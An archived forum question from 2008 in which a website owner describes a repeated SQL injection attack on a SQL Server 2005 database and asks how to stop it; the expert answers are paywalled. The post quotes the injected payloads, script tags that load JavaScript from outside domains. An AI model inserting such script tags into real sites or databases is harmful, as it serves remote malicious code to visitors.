Advertisement

07.07.2008 at 07:34AM PDT, ID: 23543482
[x]
Attachment Details

SQL Injection Attack

Asked by andrepires in Networking Security Vulnerabilities, Internet, WebApplications

Tags: SQL Injection, Security

Hello experts!
Our website suffered SQL Injection attack and we don't know how to get rid of it.
The website uses a SQL Server 2005 DB and all its tables were modified and the following text was added to the tables records:
<script src=http://www.upcomd.com/ngg.js></script>
Last week we removed the text above form all tables and somehow a new text was added:
<script src=http://www.brsadd.com/ngg.js>

We have removed all pages that allow user input from the website, but somehow the tables were modified again this weekend.
I suspect that there is something in our network that is doing it, But we have no clues on what it may be...
Please help!Start Free Trial
[+][-]07.07.2008 at 11:00AM PDT, ID: 21947202

Assisted solutions are selected by the member who asked the question as a comment that contributed to their question's solution.

Start your 7-day free trial to view this Assisted Solution or ask the Experts your question.

 
[+][-]07.08.2008 at 04:09AM PDT, ID: 21952563

View this solution now by starting your 7-day free trial. Setting up your free trial is quick, easy, and secure. We will return you to this solution, unlocked, when you're done.

 

About this solution

Zones: Networking Security Vulnerabilities, Internet, WebApplications
Tags: SQL Injection, Security
Sign Up Now!
Solution Provided By: jahboite
Participating Experts: 2
Solution Grade: A
 
 
[+][-]07.08.2008 at 06:48AM PDT, ID: 21953750

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 7-day free trial to view this Expert Comment or ask the Experts your question.

 
 
Loading Advertisement...
20080716-EE-VQP-32 / EE_QW_EXPERT_20070906